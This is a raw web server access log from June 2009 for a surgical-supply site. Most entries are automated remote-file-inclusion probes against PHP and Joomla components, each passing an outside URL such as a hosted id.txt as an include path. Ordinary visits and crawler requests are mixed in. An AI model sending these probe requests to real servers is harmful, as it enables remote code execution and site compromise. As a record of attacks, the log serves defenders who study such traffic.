77.221.130.2 - - [08/Jun/2009:00:44:43 -0400] "GET /logs/error_log.Q109042900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:44:56 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:44:56 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:44:58 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
209.59.12.99 - - [08/Jun/2009:00:46:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [08/Jun/2009:00:46:26 -0400] "GET //include/admin.lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:46:26 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:46:26 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:00:46:31 -0400] "GET /logs/access_log.Q109052900/!rfi%20administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:46:43 -0400] "GET /logs/error_log.Q109042900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
70.85.165.10 - - [08/Jun/2009:00:47:05 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:48:17 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 4639 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:48:17 -0400] "GET //?path%5Bdocroot%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:48:18 -0400] "GET /logs/access_log.Q109051000%20%20//?path%5Bdocroot%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:49:47 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:49:48 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:50:41 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:50:42 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:50:42 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
209.59.12.99 - - [08/Jun/2009:00:51:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.24.171.57 - - [08/Jun/2009:00:51:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
123.24.171.57 - - [08/Jun/2009:00:51:26 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
123.24.171.57 - - [08/Jun/2009:00:51:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
123.24.171.57 - - [08/Jun/2009:00:51:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
77.221.130.2 - - [08/Jun/2009:00:51:40 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:51:42 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:51:42 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
203.22.204.193 - - [08/Jun/2009:00:51:48 -0400] "GET /logs/access_log.Q109052600%20%20//?path%5Bdocroot%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.15.206.26 - - [08/Jun/2009:00:53:15 -0400] "GET /logs/access_log.Q109051700/index.php?option=com_pollxt&task=rss&Itemid=&mosConfig_absolute_path=http://www.amazingvacationhomes.com/assets/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.206.26 - - [08/Jun/2009:00:53:15 -0400] "GET /index.php?option=com_pollxt&task=rss&Itemid=&mosConfig_absolute_path=http://www.amazingvacationhomes.com/assets/ec.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.206.26 - - [08/Jun/2009:00:53:15 -0400] "GET /logs/index.php?option=com_pollxt&task=rss&Itemid=&mosConfig_absolute_path=http://www.amazingvacationhomes.com/assets/ec.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
70.85.165.10 - - [08/Jun/2009:00:53:48 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:00:53:48 -0400] "GET /logs/show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:00:53:48 -0400] "GET /show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:00:53:49 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:00:53:49 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:00:53:49 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:00:53:51 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:00:53:51 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:00:53:51 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:00:53:57 -0400] "GET /logs/show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:00:53:57 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:00:53:57 -0400] "GET /show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.811"
67.15.206.26 - - [08/Jun/2009:00:53:59 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_pollxt&task=rss&Itemid=&mosConfig_absolute_path=http://www.amazingvacationhomes.com/assets/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
74.6.22.170 - - [08/Jun/2009:00:54:21 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03 HTTP/1.0" 200 61561 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.185.28.194 - - [08/Jun/2009:00:54:31 -0400] "GET /logs/error_log.Q109051700//skin/zero_vote/error.php?dir=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:55:10 -0400] "GET /logs/error_log.Q109052100/show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:00:55:11 -0400] "GET /logs/error_log.Q109052100/show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
209.59.12.99 - - [08/Jun/2009:00:56:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.59.178 - - [08/Jun/2009:00:56:28 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:00:56:32 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:00:57:17 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:00:57:44 -0400] "GET /logs/errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:00:57:44 -0400] "GET /logs/access_log.Q109052200/errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:00:57:44 -0400] "GET /errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:58:40 -0400] "GET /logs/access_log.Q109052100%20/show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:00:58:52 -0400] "GET /logs/access_log.Q109052100%20/show.php?path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
61.250.85.200 - - [08/Jun/2009:00:59:31 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.150.52.114 - - [08/Jun/2009:00:59:37 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:00:59:37 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:00:59:37 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
209.59.12.99 - - [08/Jun/2009:01:01:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.250.85.200 - - [08/Jun/2009:01:02:33 -0400] "GET /errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:01:02:33 -0400] "GET /logs/error_log.Q108053100/errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:01:02:33 -0400] "GET /logs/errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:01:03:03 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:01:03:03 -0400] "GET //?_zb_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:01:03:03 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:01:03:03 -0400] "GET /logs//?_zb_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 200 4639 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:01:03:03 -0400] "GET /logs//?_zb_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 200 4639 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:01:03:03 -0400] "GET //?_zb_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
212.150.52.114 - - [08/Jun/2009:01:04:09 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
91.149.157.130 - - [08/Jun/2009:01:04:27 -0400] "GET /logs/error_log.Q108053100/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.top40argentina.com.ar/php/r8? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
91.149.157.130 - - [08/Jun/2009:01:04:28 -0400] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.top40argentina.com.ar/php/r8? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
91.149.157.130 - - [08/Jun/2009:01:04:28 -0400] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.top40argentina.com.ar/php/r8? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
61.250.85.200 - - [08/Jun/2009:01:05:39 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:01:05:45 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:01:05:45 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:01:05:51 -0400] "GET /logs/access_log.Q109051100/!rfi%20administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
66.249.71.14 - - [08/Jun/2009:01:05:57 -0400] "GET /logs/error_log.Q107082300 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [08/Jun/2009:01:06:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [08/Jun/2009:01:06:46 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:01:07:08 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:01:07:08 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:01:07:08 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:01:07:12 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:01:07:12 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:01:07:12 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
218.246.20.221 - - [08/Jun/2009:01:08:26 -0400] "GET /logs/access_log.Q109053100%20%20/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:01:08:45 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:01:08:45 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:01:08:45 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:01:08:45 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:01:08:45 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:01:10:50 -0400] "GET /logs/error_log.Q108053100%20%20/errors.php?error=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:01:11:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.152.82 - - [08/Jun/2009:01:11:16 -0400] "GET //appserv/main.php?appserv_root=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:01:11:16 -0400] "GET /logs//appserv/main.php?appserv_root=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:01:11:16 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:01:11:28 -0400] "GET /logs/access_log.Q109050700//appserv/main.php?appserv_root=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
91.184.52.8 - - [08/Jun/2009:01:13:15 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:13:15 -0400] "GET /logs/access_log.Q109052100%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:13:15 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:13:16 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:13:16 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:13:16 -0400] "GET /logs/access_log.Q109052100%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:01:13:16 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:13:17 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:13:17 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
68.98.118.196 - - [08/Jun/2009:01:13:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
68.98.118.196 - - [08/Jun/2009:01:13:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
68.98.118.196 - - [08/Jun/2009:01:13:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
68.98.118.196 - - [08/Jun/2009:01:13:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
91.184.52.8 - - [08/Jun/2009:01:13:49 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:13:49 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
68.98.118.196 - - [08/Jun/2009:01:13:55 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):broc%20mass HTTP/1.1" 200 38018 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
68.98.118.196 - - [08/Jun/2009:01:13:56 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):broc mass" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
68.98.118.196 - - [08/Jun/2009:01:13:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):broc mass" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
68.98.118.196 - - [08/Jun/2009:01:13:56 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):broc mass" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
